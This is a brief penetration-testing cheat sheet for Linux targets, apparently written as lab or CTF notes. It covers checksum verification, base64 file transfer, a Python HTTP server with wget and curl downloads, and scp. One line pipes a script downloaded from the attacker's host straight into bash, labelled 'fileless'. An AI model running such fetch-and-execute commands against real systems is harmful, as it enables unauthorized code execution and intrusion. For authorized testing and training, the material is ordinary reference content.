Target: Linux

File Hash

Always verify the MD5 checksum of a file on both the target and attack hosts after transfer to ensure it wasn't corrupted or altered. It's a good habit for file integrity checks.

# Bash
md5sum filename

# PowerShell
Get-FileHash filename -Algorithm MD5

# Cmd
certutil -hashfile filename MD5

Transfer Techniques

Base64 Encode & Decode

# Attacker
cat filename | base64 -w 0; echo

# Target
# Save the string to a file
cat base64_string | base64 -d > filename

Python HTTP Server

# Attacker
python3 -m http.server 6969

# Target
wget http://tun0:6969/filename
wget http://tun0:6969/filename.sh | bash # Fileless
curl http://tun0:6969/filename -o filename

Secure Copy Protocol (SCP)

If SSH is open and we have the private key (e.g., id_rsa) or valid credentials, we can use scp to transfer files securely between the attack and target hosts.

scp filename.txt rezy@10.10.10.10:/upload/path

File Hash​

Transfer Techniques​

Base64 Encode & Decode​

Python HTTP Server​

Secure Copy Protocol (SCP)​

File Hash

Transfer Techniques

Base64 Encode & Decode

Python HTTP Server

Secure Copy Protocol (SCP)